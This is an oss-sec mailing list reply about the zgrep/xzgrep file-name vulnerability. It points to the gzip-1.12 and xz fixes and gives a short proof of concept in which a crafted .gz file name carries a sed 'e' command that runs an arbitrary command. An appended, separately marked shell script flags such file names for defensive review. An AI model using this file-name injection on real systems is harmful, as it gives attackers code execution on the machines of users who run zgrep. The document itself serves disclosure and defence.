oss-sec mailing list archives

Re: zgrep, xzgrep: arbitrary-file-write vulnerability


From: Jakub Wilk <jwilk () jwilk net>
Date: Fri, 8 Apr 2022 10:23:29 +0200

* Jim Meyering <jim () meyering net>, 2022-04-07, 11:44:
> All previous versions of gzip and xzutils are affected.
>
> xzutils released this patch today:
>
>  https://tukaani.org/xz/xzgrep-ZDI-CAN-16587.patch
>  https://tukaani.org/xz/xzgrep-ZDI-CAN-16587.patch.sig
>
> gzip-1.12 was released today, with the fix:
>
>  https://lists.gnu.org/r/bug-gzip/2022-04/msg00011.html
>  https://ftp.gnu.org/gnu/gzip/gzip-1.12.tar.xz
>  https://ftp.gnu.org/gnu/gzip/gzip-1.12.tar.xz.sig

As mentioned in the xz patch, if you have GNU sed, you get not just file write, but direct code execution.

PoC:

   $ touch foo.gz
   $ echo foo | gzip > "$(printf '|\n;e cowsay pwned\n#.gz')"
   $ zgrep foo *.gz
    _______
   < pwned >
    -------
           \   ^__^
            \  (oo)\_______
               (__)\       )\/\
                   ||----w |
                   ||     ||
   foo

--
Jakub Wilk
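
Added example, not part of the original message and not code from the gzip or xz projects: a triage check that lists compressed files whose names contain a newline, as the PoC file name above does, before zgrep or xzgrep is run over a directory of untrusted files. The function names and the suffix list (.gz, .xz) are assumptions made for this example.

```shell
#!/bin/sh
# Added example: find compressed-file names that contain a newline.
# Function names and the suffix list are assumptions for illustration.

# A literal newline, used inside the find(1) name pattern.
NL='
'

# list_newline_names DIR
# Prints one line per matching file. Control characters in the name are
# replaced with '?' so the report itself is safe to view or log.
list_newline_names() {
    find "$1" -type f -name "*${NL}*" \
        \( -name '*.gz' -o -name '*.xz' \) \
        -exec sh -c '
            for f do
                printf "%s" "$f" | tr "[:cntrl:]" "?"
                echo
            done' sh {} +
}

# count_newline_names DIR
# Prints the number of matching files (0 when the directory is clean).
count_newline_names() {
    list_newline_names "$1" | wc -l | tr -d ' '
}

# When called with a directory argument, print the report for it.
if [ "$#" -gt 0 ]; then
    list_newline_names "$1"
fi
```

This only flags file names for review; the fix itself is the gzip-1.12 release and the xz patch linked in the quoted message.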

